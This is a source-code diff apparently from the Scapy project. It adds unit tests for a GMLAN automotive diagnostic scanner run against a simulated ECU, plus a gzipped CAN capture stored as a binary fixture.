+conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.0 + +def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwargs): + ecu = TestSocket(GMLAN) + tester = TestSocket(GMLAN) + ecu.pair(tester) + answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) + sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) + sim.start() + try: + scanner = GMLAN_Scanner( + tester, reset_handler=answering_machine.reset_state, + test_cases=enumerators, timeout=0.1, retry_if_none_received=True, + unittest=True, delay_state_change=0, **kwargs) + scanner.scan(timeout=200) + finally: + tester.send(Raw(b"\xff\xff\xff")) + sim.join(timeout=2) + assert not sim.is_alive() + return scanner + += Load packets from candump + +pkts = rdcandump(scapy_path("test/pcaps/candump_gmlan_scanner.log.gz")) +assert len(pkts) + += Create GMLAN messages from packets + +builder = ISOTPMessageBuilder(basecls=GMLAN, use_ext_addr=False, did=[0x241, 0x641]) +msgs = list() + +for p in pkts: + if p.data == b"ECURESET": + msgs.append(p) + else: + builder.feed(p) + if len(builder): + msgs.append(builder.pop()) + +assert len(msgs) + += Create ECU-Clone from packets + +mEcu = Ecu(logging=False, verbose=False, store_supported_responses=True) + +for p in msgs: + if isinstance(p, CAN) and p.data == b"ECURESET": + mEcu.reset() + else: + mEcu.update(p) + +assert len(mEcu.supported_responses) + += Test GMLAN_SAEnumerator evaluate_response + +e = GMLAN_SAEnumerator() + +config = {} + +s = EcuState(session=1) + +assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), None, **config) +config = {"exit_if_service_not_supported": True} +assert e._retry_pkt[s] == None +assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x11"), **config) +assert e._retry_pkt[s] == None +assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x22"), **config) +assert e._retry_pkt[s] == GMLAN(b"\x27\x01") +assert False == e._evaluate_response(s, GMLAN(b"\x27\x02"), GMLAN(b"\x7f\x27\x22"), **config) +assert e._retry_pkt[s] is None +assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x37"), **config) +assert e._retry_pkt[s] == GMLAN(b"\x27\x01") +assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x7f\x27\x37"), **config) +assert e._retry_pkt[s] == None +assert True == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x67\x01ab"), **config) +assert e._retry_pkt[s] == None +assert False == e._evaluate_response(s, GMLAN(b"\x27\x01"), GMLAN(b"\x67\x02ab"), **config) +assert e._retry_pkt[s] == None + + += Simulate ECU and run Scanner + +def securityAccess_Algorithm1(seed): + return 0x5F51 + +keyfunction = securityAccess_Algorithm1 + +scanner = executeScannerInVirtualEnvironment( + mEcu.supported_responses, + [GMLAN_ServiceEnumerator, GMLAN_IDOEnumerator, GMLAN_PMEnumerator, GMLAN_RDEnumerator, GMLAN_SAEnumerator], + GMLAN_SAEnumerator_kwargs={"keyfunction": keyfunction}) + +assert len(scanner.state_paths) == 11 +assert scanner.scan_completed + +assert EcuState(session=1) in scanner.final_states +assert EcuState(session=1, security_level=2) in scanner.final_states +assert EcuState(session=3, tp=1) in scanner.final_states +assert EcuState(session=2, tp=1, communication_control=1) in scanner.final_states +assert EcuState(session=2, tp=1, communication_control=1, security_level=2) in scanner.final_states +assert EcuState(session=3, tp=1, security_level=2) in scanner.final_states +assert EcuState(session=2, tp=1, communication_control=1, security_level=2, request_download=1) in scanner.final_states + += Simulate ECU and test GMLAN_RDBIEnumerator + + +resps = [EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="SubFunctionNotSupported", requestServiceId="ReadDataByIdentifier")])] + +es = [GMLAN_RDBIEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 256 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beefff" in result +assert "SubFunctionNotSupported received" in result + +ids = [t.req.dataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + + += Simulate ECU and test GMLAN_WDBIEnumerator + +def wdbi_handler(resp, req): + if req.service != 0x3b: + return False + assert req.dataIdentifier in [1, 2, 3, 0xff] + resp.dataIdentifier = req.dataIdentifier + if req.dataIdentifier == 1: + assert req.dataRecord == b'asdfbeef1' + return True + if req.dataIdentifier == 2: + assert req.dataRecord == b'beef2' + return True + if req.dataIdentifier == 3: + assert req.dataRecord == b"beef3" + return True + if req.dataIdentifier == 0xff: + assert req.dataRecord == b"beefff" + return True + return False + +resps = [EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=2)/Raw(b"beef2")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBIPR(dataIdentifier=0xff)/Raw(b"beefff")]), + EcuResponse(None, [GMLAN()/GMLAN_WDBIPR()], answers=wdbi_handler), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="SubFunctionNotSupported", requestServiceId="ReadDataByIdentifier")])] + +es = [GMLAN_WDBISelectiveEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0][0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 256 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "beef2" in result +assert "beef3" in result +assert "beefff" in result +assert "SubFunctionNotSupported received" in result + +ids = [t.req.dataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + +######################### WDBI ############################# +tc = scanner.configuration.test_cases[0][1] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 0 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +ids = [t.req.dataIdentifier for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xff in ids + + += Simulate ECU and test GMLAN_RDBPIEnumerator + +resps = [EcuResponse(None, [GMLAN()/GMLAN_RDBPIPR(parameterIdentifier=1)/Raw(b"asdfbeef1")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBPIPR(parameterIdentifier=2)/Raw(b"asdfbeef2")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBPIPR(parameterIdentifier=3)/Raw(b"beef3")]), + EcuResponse(None, [GMLAN()/GMLAN_RDBPIPR(parameterIdentifier=0xffff)/Raw(b"beefffff")]), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="SubFunctionNotSupported", requestServiceId="ReadDataByParameterIdentifier")])] + +es = [GMLAN_RDBPIEnumerator] + +scanner = executeScannerInVirtualEnvironment(resps, es, GMLAN_RDBPIEnumerator_kwargs={"scan_range":list(range(0x100)) + list(range(0xff00, 0x10000))}) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 0x200 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "asdfbeef1" in result +assert "asdfbeef2" in result +assert "beef3" in result +assert "beefffff" in result +assert "SubFunctionNotSupported received" in result + +ids = [t.req.identifiers[0] for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 0xffff in ids + += Simulate ECU and test GMLAN_TPEnumerator + +resps = [EcuResponse(None, [GMLAN(service=0x7e)])] + +es = [GMLAN_TPEnumerator] +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 0 +assert len(tc.results_with_positive_response) == 2 +assert len(tc.scanned_states) == 2 + + += Simulate ECU and test GMLAN_DCEnumerator + +resps = [EcuResponse(None, [GMLAN()/GMLAN_DCPR(CPIDNumber=1)]), + EcuResponse(None, [GMLAN()/GMLAN_DCPR(CPIDNumber=2)]), + EcuResponse(None, [GMLAN()/GMLAN_DCPR(CPIDNumber=3)/Raw(b"beef3")]), + EcuResponse(None, [GMLAN()/GMLAN_DCPR(CPIDNumber=0xff)/Raw(b"beefff")]), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="SubFunctionNotSupported", requestServiceId="DeviceControl")])] + +es = [GMLAN_DCEnumerator] +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 256 - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +ids = [t.req.CPIDNumber for t in tc.results_with_positive_response] + +assert 1 in ids +assert 2 in ids +assert 3 in ids +assert 255 in ids + +result = tc.show(dump=True) + +assert "SubFunctionNotSupported received " in result + += Simulate ECU and test GMLAN_TDEnumerator + +conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 + +positive_responses_left = 4 + +def answers_td(resp, req): + global positive_responses_left + if req.service != 0x36: + return False + if not positive_responses_left: + return False + positive_responses_left -= 1 + resp.service = 0x76 + return True + +resps = [EcuResponse(None, [GMLAN(service="TransferDataPositiveResponse")], answers=answers_td), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="RequestOutOfRange", requestServiceId="TransferData")])] + +es = [GMLAN_TDEnumerator] +scanner = executeScannerInVirtualEnvironment(resps, es) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) == 0x1ff - 4 +assert len(tc.results_with_positive_response) == 4 +assert len(tc.scanned_states) == 1 + +result = tc.show(dump=True) + +assert "RequestOutOfRange received " in result + += Simulate ECU and test GMLAN_RMBAEnumerator 1 + +conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 2 + +memory = dict() + +for addr in itertools.chain(range(0x800), range(0xf000, 0xf800), range(0xa100, 0xaf00), range(0x3000, 0x3f00)): + memory[addr] = addr & 0xff + +def answers_rmba(resp, req): + global memory + if req.service != 0x23: + return False + if req.memoryAddress not in memory.keys(): + return False + out_mem = list() + for i in range(req.memoryAddress, req.memoryAddress + req.memorySize): + try: + out_mem.append(memory[i]) + except KeyError: + pass + resp.memoryAddress = req.memoryAddress + resp.dataRecord = bytes(out_mem) + return True + +resps = [EcuResponse(None, [GMLAN()/GMLAN_RMBAPR(memoryAddress=0, dataRecord=b'')], answers=answers_rmba), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="RequestOutOfRange", requestServiceId="ReadMemoryByAddress")])] + +####################################################### +scanner = executeScannerInVirtualEnvironment(resps, [GMLAN_RMBAEnumerator]) + +assert scanner.scan_completed +tc1 = scanner.configuration.test_cases[0] + +assert len(tc1.results_without_response) < 10 +assert len(tc1.results_with_negative_response) > 80 +assert len(tc1.results_with_positive_response) > 50 +assert len(tc1.scanned_states) == 1 + +result = tc1.show(dump=True) + +assert "RequestOutOfRange received " in result + +################################################### +scanner = executeScannerInVirtualEnvironment(resps, [GMLAN_RMBAEnumerator]) + +assert scanner.scan_completed +tc2 = scanner.configuration.test_cases[0] + +assert len(tc2.results_without_response) < 10 +assert len(tc2.results_with_negative_response) > 80 +assert len(tc2.results_with_positive_response) > 50 +assert len(tc2.scanned_states) == 1 + +result = tc2.show(dump=True) + +assert "RequestOutOfRange received " in result + +############################################################ + +addrs = [t.req.memoryAddress for t in tc1.results_with_positive_response] + \ + [t.req.memoryAddress for t in tc2.results_with_positive_response] + +assert 0 in addrs +assert 0x10 in addrs +assert 0x7f0 in addrs +assert 0x3000 in addrs +assert 0x3ef0 in addrs +assert 0xa100 in addrs +assert 0xa1f0 in addrs +assert 0xa200 in addrs +assert 0xaef0 in addrs +assert 0xf000 in addrs +assert 0xf7f0 in addrs +assert 0xf800 not in addrs +assert 0xeff0 not in addrs +assert 0x2000 not in addrs + += Simulate ECU and test GMLAN_RMBAEnumerator 2 +* This test takes very long to execute + +~ disabled + +conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 3 + +memory = dict() + +for addr in itertools.chain(range(0x10000), range(0xf00000, 0xf0f000)): + memory[addr] = addr & 0xff + +resps = [EcuResponse(None, [GMLAN()/GMLAN_RMBAPR(memoryAddress=0, dataRecord=b'')], answers=answers_rmba), + EcuResponse(None, [GMLAN()/GMLAN_NR(returnCode="RequestOutOfRange", requestServiceId="ReadMemoryByAddress")])] + +scanner = executeScannerInVirtualEnvironment(resps, [GMLAN_RMBAEnumerator]) + +assert scanner.scan_completed +tc = scanner.configuration.test_cases[0] + +assert len(tc.results_without_response) < 10 +assert len(tc.results_with_negative_response) > 350 +assert len(tc.results_with_positive_response) > 50 +assert len(tc.scanned_states) == 1 + +addrs = [t.req.memoryAddress for t in tc.results_with_positive_response] + +assert 0 in addrs +assert 0x10 in addrs +assert 0xf0 in addrs +assert 0x3000 in addrs +assert 0x3090 in addrs +assert 0xa100 in addrs +assert 0xa1f0 in addrs +assert 0xa200 in addrs +assert 0xa2f0 in addrs +assert 0xf000 in addrs +assert 0xf0f0 in addrs + +result = tc.show(dump=True) + +assert "RequestOutOfRange received " in result diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index 76ee1e70d25..39592e86190 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -175,6 +175,10 @@ assert e._retry_pkt[EcuState(session=1)] == None assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x50\x03\x00"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x11\x03abcd"), UDS(b"\x51\x03\x00"), **conf) +conf = {"retry_if_none_received": True} +assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), None, **conf) +assert e._retry_pkt[EcuState(session=1)] is not None + = ServiceEnumerator execute diff --git a/test/pcaps/candump_gmlan_scanner.log.gz b/test/pcaps/candump_gmlan_scanner.log.gz new file mode 100644 index 0000000000000000000000000000000000000000..c9d2fefdf5ae91884fd34771a65db9ecd52688c5 GIT binary patch literal 28893 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 